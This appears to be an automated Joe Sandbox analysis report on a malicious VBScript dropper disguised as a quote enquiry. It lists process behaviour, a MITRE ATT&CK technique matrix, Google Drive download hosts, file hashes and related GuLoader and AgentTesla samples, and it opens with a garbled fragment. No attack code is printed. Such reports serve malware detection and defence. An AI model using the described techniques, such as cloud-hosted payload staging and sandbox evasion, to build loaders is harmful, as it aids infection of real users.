,ya.l,ulspoubgfoi,psg t,ai ,c ra .l s.,ihque .aggd .e.ur pske[.y$.nvfee.ml mov,Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information121
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		121
              Scripting              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts21
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		Logon Script (Windows)Logon Script (Windows)11
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              Deobfuscate/Decode Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
              Obfuscated Files or Information              		LSA Secrets13
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Enquiry Quote - 24071834-01.vbs3%ReversingLabsWin32.Dropper.Generic
              Enquiry Quote - 24071834-01.vbs10%VirustotalBrowse

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              drive.google.com0%VirustotalBrowse
              drive.usercontent.google.com1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://drive.usercontent.googh0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://drive.google.com/uc?ex0%Avira URL Cloudsafe
              https://drive.google.com/u0%Avira URL Cloudsafe
              http://drive.usercontent.google.com0%Avira URL Cloudsafe
              https://drive.goog0%Avira URL Cloudsafe
              https://drive.googP0%Avira URL Cloudsafe
              https://drive.google.com/uc?ex2%VirustotalBrowse
              https://drive.goog1%VirustotalBrowse
              https://drive.google.com/u0%VirustotalBrowse
              http://drive.google.com0%VirustotalBrowse
              https://drive.google.0%VirustotalBrowse
              http://drive.google.com0%Avira URL Cloudsafe
              https://drive.google.0%Avira URL Cloudsafe
              http://drive.usercontent.google.com1%VirustotalBrowse
              https://drive.go0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              https://drive.goo0%Avira URL Cloudsafe
              https://www.google.com0%Avira URL Cloudsafe
              http://crl.m0%Avira URL Cloudsafe
              https://drive.g0%Avira URL Cloudsafe
              https://github.com/Pester/Pester1%VirustotalBrowse
              https://drive.goo0%VirustotalBrowse
              https://drive.google.com/uc0%Avira URL Cloudsafe
              https://drive.google.com/0%Avira URL Cloudsafe
              https://drive.googl0%Avira URL Cloudsafe
              https://drive.google.com/uc?e0%Avira URL Cloudsafe
              https://drive.google.com0%Avira URL Cloudsafe
              https://drive.google.com/uc1%VirustotalBrowse
              https://drive.usercontent.google.com0%Avira URL Cloudsafe
              https://www.google.com0%VirustotalBrowse
              https://drive.google.com/1%VirustotalBrowse
              https://drive.google.c0%Avira URL Cloudsafe
              https://drive.google.com/uc?0%Avira URL Cloudsafe
              http://crl.v0%Avira URL Cloudsafe
              https://drive.usercontent.google.com1%VirustotalBrowse
              https://drive.google.com/uc?e2%VirustotalBrowse
              https://drive.google0%Avira URL Cloudsafe
              https://drive.google.co0%Avira URL Cloudsafe
              https://drive.google.com1%VirustotalBrowse
              https://drive.google0%VirustotalBrowse
              https://drive.google.co0%VirustotalBrowse
              https://drive.google.com/uc?0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              		216.58.206.46
              		truefalseunknown
              drive.usercontent.google.com
              		172.217.16.193
              		truefalseunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://drive.usercontent.google.compowershell.exe, 0000000F.00000002.2546103822.000001FAD0A1C000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://drive.googpowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://drive.google.com/uc?expowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://drive.google.com/upowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://go.micropowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://drive.googPpowershell.exe, 0000000F.00000002.2546103822.000001FAD09DE000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://drive.usercontent.googhpowershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://drive.google.compowershell.exe, 0000000F.00000002.2546103822.000001FAD09E3000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://drive.google.powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://drive.gopowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000013.00000002.2545333721.0000000004D77000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://drive.goopowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://www.google.compowershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://crl.mpowershell.exe, 0000000F.00000002.2642359454.000001FAE72D0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://drive.gpowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://drive.google.com/ucpowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/pscore6lBpowershell.exe, 00000013.00000002.2545333721.0000000004C21000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://drive.google.com/powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://drive.googlpowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://drive.google.com/uc?epowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://nuget.org/nuget.exepowershell.exe, 0000000F.00000002.2617063017.000001FADEC6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2550702407.0000000005C82000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://drive.google.compowershell.exe, 0000000F.00000002.2546103822.000001FAD068A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACEE26000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://drive.usercontent.google.compowershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FACF0C8000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://drive.google.cpowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://aka.ms/pscore68powershell.exe, 0000000F.00000002.2546103822.000001FACEC01000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://apis.google.compowershell.exe, 0000000F.00000002.2546103822.000001FACF0C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2546103822.000001FAD0A09000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://drive.google.com/uc?powershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.2546103822.000001FACEC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2545333721.0000000004C21000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crl.vpowershell.exe, 0000000F.00000002.2637600894.000001FAE7063000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://drive.googlepowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://drive.google.copowershell.exe, 0000000F.00000002.2546103822.000001FACFF39000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              172.217.16.193
              		drive.usercontent.google.comUnited States
              		15169GOOGLEUSfalse
              216.58.206.46
              		drive.google.comUnited States
              		15169GOOGLEUSfalse

              General Information

              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1466658
              Start date and time:2024-07-03 08:51:46 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 7m 6s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:22
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:Enquiry Quote - 24071834-01.vbs
              Detection:MAL
              Classification:mal100.troj.expl.evad.winVBS@9/8@2/2
              EGA Information:Failed
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 49
              • Number of non-executed functions: 12
              Cookbook Comments:
              • Found application associated with file extension: .vbs

              Warnings

              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 93.184.221.240
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, time.windows.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
              • Execution Graph export aborted for target powershell.exe, PID 3024 because it is empty
              • Execution Graph export aborted for target powershell.exe, PID 8084 because it is empty
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              02:52:41API Interceptor1x Sleep call for process: wscript.exe modified
              04:17:54API Interceptor281x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              3b5074b1b5d032e5620f69f9f700ff0e2669976595_366408723_KHI_SOF_240702_0957_P.vbsGet hashmaliciousGuLoaderBrowse
              • 172.217.16.193
              • 216.58.206.46
              DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbsGet hashmaliciousGuLoaderBrowse
              • 172.217.16.193
              • 216.58.206.46
              AF85714759_htm#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
              • 172.217.16.193
              • 216.58.206.46
              Zapytanie ofertowe (GASTRON 07022024).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 172.217.16.193
              • 216.58.206.46
              B24E33 ENQUIRY.vbeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 172.217.16.193
              • 216.58.206.46
              Purchase Order N#U00b0 20240702.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
              • 172.217.16.193
              • 216.58.206.46
              AWB 3609 961.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
              • 172.217.16.193
              • 216.58.206.46
              MT_0615_60931PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 172.217.16.193
              • 216.58.206.46
              Doc230906103882.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 172.217.16.193
              • 216.58.206.46
              birectangular.vbsGet hashmaliciousFormBook, GuLoaderBrowse
              • 172.217.16.193
              • 216.58.206.46

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

              Download File
              Process:C:\Windows\System32\wscript.exe
              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
              Category:dropped
              Size (bytes):71954
              Entropy (8bit):7.996617769952133
              Encrypted:true
              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

              Download File
              Process:C:\Windows\System32\wscript.exe
              File Type:data
              Category:modified
              Size (bytes):328
              Entropy (8bit):3.144086598890895
              Encrypted:false
              SSDEEP:6:kKIii9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:gidDnLNkPlE99SNxAhUe/3
              MD5:23176B4BE747FB4BC0BF6360ED4F8E6E
              SHA1:CFE8E662ECE99256BAFEC26AF4DCDBF02E2961A4
              SHA-256:7BC5E85F341758F6BE52D4C59D65AA46AE1557FC634921C7790FE43940819207
              SHA-512:1412ABDCF896EA5BB3600535837B490721232692FA69A95D193A8EBB36EABC3F1B06F6C37855F2EC02EAB28B561D1B96C9C32F55705E3E92D066A9D07BDAC0DE
              Malicious:false
              Reputation:low
              Preview:p...... ........Q.T.....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:modified
              Size (bytes):11608
              Entropy (8bit):4.8908305915084105
              Encrypted:false
              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
              MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
              SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
